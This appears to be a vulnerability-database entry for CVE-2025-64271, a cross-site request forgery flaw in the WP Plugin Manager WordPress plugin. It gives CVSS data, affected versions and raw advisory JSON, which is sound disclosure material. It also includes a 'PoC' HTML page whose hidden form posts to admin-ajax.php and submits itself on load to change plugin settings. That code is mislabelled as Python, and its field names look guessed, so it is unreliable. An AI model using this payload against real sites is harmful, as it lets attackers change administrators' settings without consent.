Security Vulnerability Report
中文
CVE-2025-64271 CVSS 4.3 MEDIUM

CVE-2025-64271

Published: 2025-11-13 10:15:52
Last Modified: 2026-04-27 16:16:39

Description

Cross-Site Request Forgery (CSRF) vulnerability in HasThemes WP Plugin Manager wp-plugin-manager allows Cross Site Request Forgery.This issue affects WP Plugin Manager: from n/a through <= 1.4.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hasthemes:wp_plugin_manager:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Plugin Manager <= 1.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64271 - WP Plugin Manager CSRF --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-64271</title> </head> <body> <h1>CSRF PoC for WP Plugin Manager</h1> <p>This PoC demonstrates the CSRF vulnerability in WP Plugin Manager <= 1.4.7</p> <!-- Example: Force disable all plugins --> <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="wppm_save_settings"> <input type="hidden" name="wppm_enabled" value="0"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If successful, the plugin settings would be modified without user's consent.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64271", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:52.470", "lastModified": "2026-04-27T16:16:39.283", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in HasThemes WP Plugin Manager wp-plugin-manager allows Cross Site Request Forgery.This issue affects WP Plugin Manager: from n/a through <= 1.4.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hasthemes:wp_plugin_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.4.8", "matchCriteriaId": "3AB333A6-CEBC-4ACA-8A93-C9CD02B29CED"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-plugin-manager/vulnerability/wordpress-wp-plugin-manager-plugin-1-4-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}